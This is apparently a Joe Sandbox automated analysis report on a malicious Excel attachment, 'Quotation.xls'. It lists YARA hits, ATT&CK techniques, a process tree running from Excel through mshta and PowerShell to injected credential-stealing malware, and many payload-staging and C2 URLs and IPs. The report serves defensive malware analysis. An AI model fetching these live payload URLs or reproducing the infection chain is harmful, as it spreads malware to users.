            Source: Yara match File source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3660, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: cmd.exe 25_2_0040569A
            MITRE ATT&CK Matrix, listed by tactic column (a leading number is the count of matched signatures for that technique):

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
            Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
            Execution: 1 Native API; 13 Exploitation for Client Execution; 121 Command and Scripting Interpreter; 2 Service Execution; 3 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
            Persistence: 1 Scripting; 1 DLL Side-Loading; 1 Windows Service; 1 Browser Extensions; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
            Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 322 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
            Defense Evasion: 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 1 Install Root Certificate; 1 Software Packing; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 322 Process Injection; Stripped Payloads
            Credential Access: 1 OS Credential Dumping; 111 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
            Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 36 System Information Discovery; 121 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
            Collection: 11 Archive Collected Data; 1 Email Collection; 111 Input Capture; 4 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
            Command and Control: 23 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 122 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
            Behavior Graph ID: 1482857, Sample: Quotation.xls, Startdate: 26/07/2024, Architecture: WINDOWS, Score: 100

            Start (node 2)
              Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
              • EXCEL.EXE (node 10; graph counts 57 39), started by 2
                DNS/IP: 91.92.245.100 (ports 49164, 49166, 49170) THEZONEBG, Bulgaria; tny.wtf 188.114.96.3 (ports 49163, 49165, 49171) CLOUDFLARENETUS, European Union
                Dropped: C:\Users\user\Desktop\Quotation.xls (copy), Composite; C:\Users\user\AppData\Local\...\gdfvr[1].hta, HTML
                Signatures: Microsoft Office drops suspicious files
                • mshta.exe (node 15; graph count 10), started by 10
                  DNS/IP: tny.wtf
                  Signatures: Suspicious command line found; PowerShell case anomaly found
                  • cmd.exe (node 21), started by 15
                    Signatures: Suspicious powershell command line found; PowerShell case anomaly found
                    • powershell.exe (node 26; graph count 24), started by 21
                      DNS/IP: 107.173.143.46 (ports 49167, 80) AS-COLOCROSSINGUS, United States
                      Dropped: C:\Users\user\AppData\Roaming\winiti.exe, PE32+; C:\Users\user\AppData\Local\...\csrss[1].exe, PE32+; C:\Users\user\AppData\...\ofvwqfjd.cmdline, Unicode
                      Signatures: Installs new ROOT certificates; Powershell drops PE file
                      • winiti.exe (node 33), started by 26
                        • InstallUtil.exe (node 43; graph counts 3 10), started by 33
                          DNS/IP: unifrieghtmovers.com 23.95.60.82 (ports 2558, 49168) AS-COLOCROSSINGUS, United States; geoplugin.net 178.237.33.50 (ports 49169, 80) ATOM86-ASATOM86NL, Netherlands
                      • csc.exe (node 36; graph count 2), started by 26
                        Dropped: C:\Users\user\AppData\Local\...\ofvwqfjd.dll, PE32
                        • cvtres.exe (node 46), started by 36
                • mshta.exe (node 19; graph count 10), started by 10
                  DNS/IP: tny.wtf
                  • cmd.exe (node 24), started by 19
                    • powershell.exe (node 31), started by 24
                      • winiti.exe (node 39), started by 31
                        Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
                        • AddInProcess32.exe (node 48), started by 39
                          Signatures: Contains functionality to bypass UAC (CMSTPLUA); Contains functionality to steal Chrome passwords or cookies; Contains functionality to register a low level keyboard hook; 2 other signatures
                        • MSBuild.exe (node 51), started by 39
                      • csc.exe (node 41; graph count 2), started by 31
                        Dropped: C:\Users\user\AppData\Local\...\ge3s1wmx.dll, PE32
                        • cvtres.exe (node 53), started by 41

            Source | Detection | Scanner | Label / Link
            Quotation.xls | 18% | ReversingLabs | Document-Excel.Exploit.CVE-2017-0199
            Quotation.xls | 24% | Virustotal | Browse
            Quotation.xls | 100% | Joe Sandbox ML |
            Source | Detection | Scanner | Label / Link
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe | 22% | Virustotal | Browse
            No Antivirus matches
            Source | Detection | Scanner | Label / Link
            geoplugin.net | 1% | Virustotal | Browse
            tny.wtf | 5% | Virustotal | Browse
            Source | Detection | Scanner | Label / Link
            http://ocsp.entrust.net03 | 0% | URL Reputation | safe
            https://contoso.com/License | 0% | URL Reputation | safe
            http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
            http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
            https://contoso.com/ | 0% | URL Reputation | safe
            https://nuget.org/nuget.exe | 0% | URL Reputation | safe
            http://ocsp.entrust.net0D | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
            http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
            https://contoso.com/Icon | 0% | URL Reputation | safe
            http://91.92.245.100/up | 0% | Avira URL Cloud | safe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htax | 0% | Avira URL Cloud | safe
            http://107.173.143.46/T2507F/csrss.exep | 0% | Avira URL Cloud | safe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaC: | 0% | Avira URL Cloud | safe
            http://107.173.143.46/T2507F/csr | 0% | Avira URL Cloud | safe
            http://geoplugin.net/json.gp | 0% | URL Reputation | safe
            https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe
            http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
            https://aka.ms/nativeaot-c | 0% | Avira URL Cloud | safe
            http://107.173.143.46/T2507F/csrss.exewerSh | 0% | Avira URL Cloud | safe
            http://107.173.143.46/T2507F/csrss.exep | 13% | Virustotal | Browse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaC: | 5% | Virustotal | Browse
            http://107.173.143.46/T2507F/csrss.exed. | 0% | Avira URL Cloud | safe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
            http://go.micros | 0% | Avira URL Cloud | safe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htax | 5% | Virustotal | Browse
            http://107.173.143.46/T2507F/csrss.exe | 0% | Avira URL Cloud | safe
            http://tny.wtf/jjJsPXdO | 0% | Avira URL Cloud | safe
            https://aka.ms/nativeaot-compatibility | 0% | Avira URL Cloud | safe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Virustotal | Browse
            unifrieghtmovers.com | 0% | Avira URL Cloud | safe
            https://aka.ms/nativeaot-c | 0% | Virustotal | Browse
            http://107.173.143.46/T2507F/csrss.exe | 13% | Virustotal | Browse
            http://tny.wtf/jjJsPX0 | 0% | Avira URL Cloud | safe
            https://aka.ms/nativeaot-compatibility | 0% | Virustotal | Browse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta0 | 0% | Avira URL Cloud | safe
            http://107.173.143.46/T2507F/csr | 13% | Virustotal | Browse
            http://crl.usertru8 | 0% | Avira URL Cloud | safe
            http://tny.wtf/ | 0% | Avira URL Cloud | safe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...r | 0% | Avira URL Cloud | safe
            https://aka.ms/nativeaot-compatibilityy | 0% | Avira URL Cloud | safe
            http://tny.wtf/jjJsPX0 | 4% | Virustotal | Browse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...b | 0% | Avira URL Cloud | safe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta | 0% | Avira URL Cloud | safe
            http://tny.wtf/ | 5% | Virustotal | Browse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaoso | 0% | Avira URL Cloud | safe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta | 5% | Virustotal | Browse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta | 0% | Avira URL Cloud | safe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaic | 0% | Avira URL Cloud | safe
            http://tny.wtf/jjJsPX | 0% | Avira URL Cloud | safe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaP | 0% | Avira URL Cloud | safe
            http://tny.wtf/jjJsPXM | 0% | Avira URL Cloud | safe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta | 5% | Virustotal | Browse
            http://tny.wtf/jjJsPX | 4% | Virustotal | Browse
            https://aka.ms/nativeaot-compatibilityy | 0% | Virustotal | Browse
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
            http://tny.wtf/jjJsPXa | 0% | Avira URL Cloud | safe
            http://91.92.245.100/ | 0% | Avira URL Cloud | safe
            http://tny.wtf/jjJsPXe | 0% | Avira URL Cloud | safe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Virustotal | Browse
            http://107.173.143.46/T2507F/csrss.exem1 | 0% | Avira URL Cloud | safe
            http://tny.wtf/jjJsPXa | 4% | Virustotal | Browse
            https://aka.ms/nativeaot-compatibilityX | 0% | Avira URL Cloud | safe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htat | 0% | Avira URL Cloud | safe
            http://91.92.245.100/ | 2% | Virustotal | Browse
            https://aka.ms/GlobalizationInvariantMode | 0% | Avira URL Cloud | safe
            https://aka.ms/GlobalizationInvariantMode | 0% | Virustotal | Browse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htao | 0% | Avira URL Cloud | safe
            https://aka.ms/nativeaot-compatibilityX | 0% | Virustotal | Browse
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            geoplugin.net | 178.237.33.50 | true | false | - | unknown
            tny.wtf | 188.114.96.3 | true | false | - | unknown
            unifrieghtmovers.com | 23.95.60.82 | true | true | - | unknown
              Name | Malicious | Reputation (antivirus detections are listed below each row)
              http://107.173.143.46/T2507F/csrss.exe | false | unknown
              • 13%, Virustotal, Browse
              • Avira URL Cloud: safe
              unifrieghtmovers.com | true | unknown
              • Avira URL Cloud: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta | false | unknown
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://tny.wtf/jjJsPX | true | unknown
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://geoplugin.net/json.gp | false | unknown
              • URL Reputation: safe
              Name | Source | Malicious | Reputation (antivirus detections are listed below each row)
              http://107.173.143.46/T2507F/csrss.exep | powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • 13%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htax | mshta.exe, 00000004.00000003.424339169.00000000029ED000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaC: | mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.475597397.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475195108.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475273547.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://91.92.245.100/up | mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://ocsp.entrust.net03 | powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://107.173.143.46/T2507F/csr | powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • 13%, Virustotal, Browse
              • Avira URL Cloud: safe
              https://aka.ms/nativeaot-c | winiti.exe | false | unknown
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://107.173.143.46/T2507F/csrss.exewerSh | powershell.exe, 00000013.00000002.489480770.000000001C2B3000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://107.173.143.46/T2507F/csrss.exed. | powershell.exe, 00000007.00000002.455975386.000000001C3C0000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              https://contoso.com/License | powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://go.micros | powershell.exe, 00000007.00000002.449435147.00000000039AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449435147.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://geoplugin.net/json.gp/C | winiti.exe, 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://tny.wtf/jjJsPXdO | mshta.exe, 00000004.00000002.426650373.000000000012A000.00000004.00000020.00020000.00000000.sdmp | true | unknown
              • Avira URL Cloud: safe
              https://aka.ms/nativeaot-compatibility | winiti.exe | false | unknown
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              https://contoso.com/ | powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://tny.wtf/jjJsPX0 | Quotation.xls, 37330000.0.dr | true | unknown
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta0 | mshta.exe, 00000004.00000003.424041898.00000000029E5000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://ocsp.entrust.net0D | powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://crl.usertru8 | powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.449435147.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000023A1000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://tny.wtf/ | mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.475855460.0000000003A80000.00000004.00000020.00020000.00000000.sdmp | true | unknown
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...r | mshta.exe, 00000004.00000003.421936825.0000000000173000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://crl.entrust.net/server1.crl0 | powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              https://aka.ms/nativeaot-compatibilityy | winiti.exe, 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 0000000B.00000000.447217263.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 0000000B.00000002.451807346.0000000143000000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484524464.0000000142800000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000000.481803220.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe.7.dr, csrss[1].exe.7.dr | false | unknown
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              https://contoso.com/Icon | powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...b | mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta | mshta.exe, 00000010.00000003.473435491.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.474035843.0000000002A65000.00000004.00000800.00020000.00000000.sdmp | false | unknown
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaoso | mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaic | mshta.exe, 00000010.00000002.475597397.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475195108.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475273547.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaP | mshta.exe, 00000010.00000002.475855460.0000000003A80000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://tny.wtf/jjJsPXM | mshta.exe, 00000010.00000002.475597397.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475195108.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475273547.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmp | true | unknown
              • Avira URL Cloud: safe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://tny.wtf/jjJsPXa | mshta.exe, 00000010.00000002.475550897.000000000022A000.00000004.00000020.00020000.00000000.sdmp | true | unknown
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://91.92.245.100/ | mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.475855460.0000000003A80000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              http://tny.wtf/jjJsPXe | mshta.exe, 00000010.00000002.475550897.000000000022A000.00000004.00000020.00020000.00000000.sdmp | true | unknown
              • Avira URL Cloud: safe
              http://107.173.143.46/T2507F/csrss.exem1 | powershell.exe, 00000013.00000002.489480770.000000001C2B3000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              https://aka.ms/nativeaot-compatibilityY | csrss[1].exe.7.dr | false | unknown
              https://aka.ms/nativeaot-compatibilityX | winiti.exe, 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp | false | unknown
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              https://aka.ms/GlobalizationInvariantMode | winiti.exe, winiti.exe, 00000016.00000002.484524464.0000000142800000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000000.481803220.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp, winiti.exe.7.dr, csrss[1].exe.7.dr | false | unknown
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              https://secure.comodo.com/CPS0 | powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C3C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htat | mshta.exe, 00000004.00000002.426650373.0000000000173000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.0000000000173000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
              http://crl.entrust.net/2048ca.crl0 | powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • URL Reputation: safe
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htao | mshta.exe, 00000004.00000002.429059359.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | unknown
              • Avira URL Cloud: safe
                IP | Domain | Country | ASN | ASN Name | Malicious
                91.92.245.100 | unknown | Bulgaria | 34368 | THEZONEBG | false
                107.173.143.46 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
                188.114.96.3 | tny.wtf | European Union | 13335 | CLOUDFLARENETUS | false
                178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                23.95.60.82 | unifrieghtmovers.com | United States | 36352 | AS-COLOCROSSINGUS | true
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1482857
                Start date and time:2024-07-26 09:28:36 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 19s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of new started processes analysed:28
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Quotation.xls
                Detection:MAL
                Classification:mal100.phis.troj.spyw.expl.evad.winXLS@29/32@6/5
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Override analysis time to 63736.6357706607 for current running targets taking high CPU consumption
                • Override analysis time to 127473.271541321 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                • Execution Graph export aborted for target mshta.exe, PID 3296 because there are no executed functions
